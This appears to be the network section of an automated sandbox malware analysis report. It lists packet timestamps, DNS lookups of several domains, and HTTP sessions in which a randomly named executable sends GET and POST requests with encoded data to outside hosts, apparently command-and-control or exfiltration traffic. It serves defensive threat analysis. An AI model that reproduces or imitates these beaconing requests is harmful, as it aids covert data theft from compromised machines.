                                                    Oct 9, 2024 14:02:35.691507101 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691523075 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691539049 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691555977 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691601038 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691631079 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691647053 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691797018 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691813946 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691874027 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691884041 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691890001 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691905975 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691922903 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691924095 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691939116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691946030 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.691953897 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.691977978 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.745229959 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.746679068 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746757030 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746795893 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.746831894 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747347116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747405052 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747423887 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747459888 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747493029 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747513056 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747526884 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747560024 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747565031 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.747594118 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.747631073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774141073 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774243116 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774267912 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774282932 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774297953 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774313927 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774328947 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774331093 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774343967 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774359941 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774373055 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774374962 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774389029 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774405003 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774418116 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774465084 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774782896 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774810076 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774826050 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774851084 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.774930000 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774945021 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774960995 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.774975061 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.775003910 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.775744915 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775890112 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775914907 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.775930882 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776060104 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776074886 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776092052 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776104927 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776134014 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.776823997 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776840925 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776856899 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.776989937 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777123928 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777139902 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777154922 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777173996 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777209997 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777601004 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777746916 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777762890 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777777910 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777791977 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777795076 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777820110 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.777892113 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.777937889 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.778692007 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778712988 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778733969 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778760910 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.778837919 CEST804998744.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:35.778881073 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:35.792689085 CEST4998780192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.811815023 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.817272902 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:36.817398071 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.824409008 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:36.829931021 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:37.982923985 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003098011 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003123999 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:38.003283024 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.004648924 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.005978107 CEST4998880192.168.2.944.213.25.70
                                                    Oct 9, 2024 14:02:38.010883093 CEST804998844.213.25.70192.168.2.9
                                                    Oct 9, 2024 14:02:43.273756027 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.278983116 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:43.279318094 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.294836998 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:43.299689054 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031128883 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031162024 CEST8049989217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:44.031246901 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:44.807970047 CEST4998980192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.869112015 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.874083996 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:45.874193907 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.892370939 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:45.897308111 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528211117 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528834105 CEST8049990217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:46.528894901 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:47.401705980 CEST4999080192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.447841883 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.452819109 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:48.452943087 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.490209103 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:48.495398045 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:48.495512009 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.191828012 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.191979885 CEST8049991217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:49.192197084 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:49.995743990 CEST4999180192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.033441067 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.040519953 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.040649891 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.068710089 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.076180935 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703099012 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703176975 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703190088 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:51.703360081 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.705686092 CEST4999280192.168.2.9217.160.0.231
                                                    Oct 9, 2024 14:02:51.710623026 CEST8049992217.160.0.231192.168.2.9
                                                    Oct 9, 2024 14:02:56.754997969 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.759958982 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:56.760119915 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.771025896 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:56.776048899 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.355895042 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.356194019 CEST8049993199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:57.356326103 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:58.276665926 CEST4999380192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.295099974 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.300143003 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.300282955 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.311409950 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:02:59.316355944 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.899641991 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.899924040 CEST8049994199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:02:59.900095940 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:00.823407888 CEST4999480192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.844705105 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.849735975 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:01.849921942 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.862705946 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:01.868429899 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:01.868446112 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522177935 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522463083 CEST8049995199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:02.522731066 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:03.948591948 CEST4999580192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.967365980 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.972496033 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:04.972603083 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.979829073 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:04.984972954 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563469887 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563600063 CEST8049996199.192.21.169192.168.2.9
                                                    Oct 9, 2024 14:03:05.563664913 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:05.566375971 CEST4999680192.168.2.9199.192.21.169
                                                    Oct 9, 2024 14:03:05.571573019 CEST8049996199.192.21.169192.168.2.9
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Oct 9, 2024 14:01:59.807276964 CEST | 61455 | 53 | 192.168.2.9 | 1.1.1.1
                                                     Oct 9, 2024 14:01:59.860987902 CEST | 53 | 61455 | 1.1.1.1 | 192.168.2.9
                                                     Oct 9, 2024 14:02:15.592539072 CEST | 50584 | 53 | 192.168.2.9 | 1.1.1.1
                                                     Oct 9, 2024 14:02:15.676147938 CEST | 53 | 50584 | 1.1.1.1 | 192.168.2.9
                                                     Oct 9, 2024 14:02:28.999229908 CEST | 62535 | 53 | 192.168.2.9 | 1.1.1.1
                                                     Oct 9, 2024 14:02:29.162264109 CEST | 53 | 62535 | 1.1.1.1 | 192.168.2.9
                                                     Oct 9, 2024 14:02:43.022150993 CEST | 53561 | 53 | 192.168.2.9 | 1.1.1.1
                                                     Oct 9, 2024 14:02:43.271066904 CEST | 53 | 53561 | 1.1.1.1 | 192.168.2.9
                                                     Oct 9, 2024 14:02:56.722927094 CEST | 52127 | 53 | 192.168.2.9 | 1.1.1.1
                                                     Oct 9, 2024 14:02:56.752389908 CEST | 53 | 52127 | 1.1.1.1 | 192.168.2.9
                                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                     Oct 9, 2024 14:01:59.807276964 CEST | 192.168.2.9 | 1.1.1.1 | 0x4d8c | Standard query (0) | www.kovallo.cloud | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:15.592539072 CEST | 192.168.2.9 | 1.1.1.1 | 0x17f3 | Standard query (0) | www.030002304.xyz | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:28.999229908 CEST | 192.168.2.9 | 1.1.1.1 | 0x1e6b | Standard query (0) | www.newdaydawning.net | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:43.022150993 CEST | 192.168.2.9 | 1.1.1.1 | 0xaf29 | Standard query (0) | www.coffee-and-blends.info | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:56.722927094 CEST | 192.168.2.9 | 1.1.1.1 | 0x136e | Standard query (0) | www.tophm.xyz | A (IP address) | IN (0x0001) | false
                                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                     Oct 9, 2024 14:00:57.163038969 CEST | 1.1.1.1 | 192.168.2.9 | 0x38c4 | No error (0) | shed.dual-low.s-part-0032.t-0009.t-msedge.net | s-part-0032.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                     Oct 9, 2024 14:00:57.163038969 CEST | 1.1.1.1 | 192.168.2.9 | 0x38c4 | No error (0) | s-part-0032.t-0009.t-msedge.net | | 13.107.246.60 | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:01:59.860987902 CEST | 1.1.1.1 | 192.168.2.9 | 0x4d8c | No error (0) | www.kovallo.cloud | kovallo.cloud | | CNAME (Canonical name) | IN (0x0001) | false
                                                     Oct 9, 2024 14:01:59.860987902 CEST | 1.1.1.1 | 192.168.2.9 | 0x4d8c | No error (0) | kovallo.cloud | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:15.676147938 CEST | 1.1.1.1 | 192.168.2.9 | 0x17f3 | No error (0) | www.030002304.xyz | 030002304.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:15.676147938 CEST | 1.1.1.1 | 192.168.2.9 | 0x17f3 | No error (0) | 030002304.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:29.162264109 CEST | 1.1.1.1 | 192.168.2.9 | 0x1e6b | No error (0) | www.newdaydawning.net | newdaydawning.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:29.162264109 CEST | 1.1.1.1 | 192.168.2.9 | 0x1e6b | No error (0) | newdaydawning.net | | 44.213.25.70 | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:43.271066904 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf29 | No error (0) | www.coffee-and-blends.info | | 217.160.0.231 | A (IP address) | IN (0x0001) | false
                                                     Oct 9, 2024 14:02:56.752389908 CEST | 1.1.1.1 | 192.168.2.9 | 0x136e | No error (0) | www.tophm.xyz | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     0 | 192.168.2.9 | 49980 | 81.2.196.19 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:01:59.885922909 CEST | 513 | OUT | GET /koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA== HTTP/1.1
                                                    Host: www.kovallo.cloud
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                     Oct 9, 2024 14:02:00.547663927 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 09 Oct 2024 12:02:00 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     1 | 192.168.2.9 | 49981 | 65.21.196.90 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:15.698322058 CEST | 778 | OUT | POST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 39 74 2f 5a 35 4e 53 49 47 49 53 55 66 41 51 52 51 51 46 69 69 30 4f 77 44 78 65 4b 44 75 49 36 7a 37 33 4b 4e 6c 49 59 49 63 45 37 36 77 46 4e 51 41 62 5a 36 4e 64 46 67 38 5a 77 58 63 62 2b 37 7a 47 6e 51 62 33 70 6f 32 2b 51 53 61 56 4c 54 44 33 42 5a 30 6f 4f 76 64 6f 42 77 74 33 67 4a 41 73 58 63 31 2b 61 37 4d 76 59 6b 52 7a 67 32 48 6a 6e 67 37 56 37 48 2f 41 44 73 33 50 77 46 31 64 37 48 62 78 39 53 4a 37 51 6d 4e 72 4c 47 49 37 32 6e 62 34 79 4f 58 50 2f 65 59 6e 41 4a 67 53 68 70 68 77 41 48 6e 39 34 4a 2b 31 63
                                                    Data Ascii: 8T2hn=1veu06OtMkxu9t/Z5NSIGISUfAQRQQFii0OwDxeKDuI6z73KNlIYIcE76wFNQAbZ6NdFg8ZwXcb+7zGnQb3po2+QSaVLTD3BZ0oOvdoBwt3gJAsXc1+a7MvYkRzg2Hjng7V7H/ADs3PwF1d7Hbx9SJ7QmNrLGI72nb4yOXP/eYnAJgShphwAHn94J+1c
                                                     Oct 9, 2024 14:02:16.350398064 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:16 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     2 | 192.168.2.9 | 49982 | 65.21.196.90 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:18.249644041 CEST | 802 | OUT | POST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 38 4f 6e 5a 37 75 36 49 45 6f 53 54 51 67 51 52 65 77 46 6d 69 31 79 77 44 77 62 52 44 63 63 36 79 61 48 4b 4d 6b 49 59 59 4d 45 37 75 67 46 4d 55 41 62 6f 36 4e 5a 6e 67 39 6c 77 58 63 50 2b 37 33 43 6e 51 49 66 75 6f 6d 2b 53 61 36 56 4a 58 44 33 42 5a 30 6f 4f 76 64 38 37 77 74 76 67 49 7a 30 58 65 58 57 5a 34 4d 76 5a 73 78 7a 67 67 48 6a 6a 67 37 56 6a 48 2b 63 74 73 31 33 77 46 77 5a 37 48 71 78 2b 63 35 37 53 35 39 71 34 42 61 4f 44 6f 36 45 61 42 42 44 71 49 61 2b 6f 44 68 79 2f 34 54 35 62 53 77 39 66 4f 5a 38 30 73 6c 35 2f 6b 2f 34 4b 41 4f 44 42 74 37 56 47 47 78 33 68 45 41 3d 3d
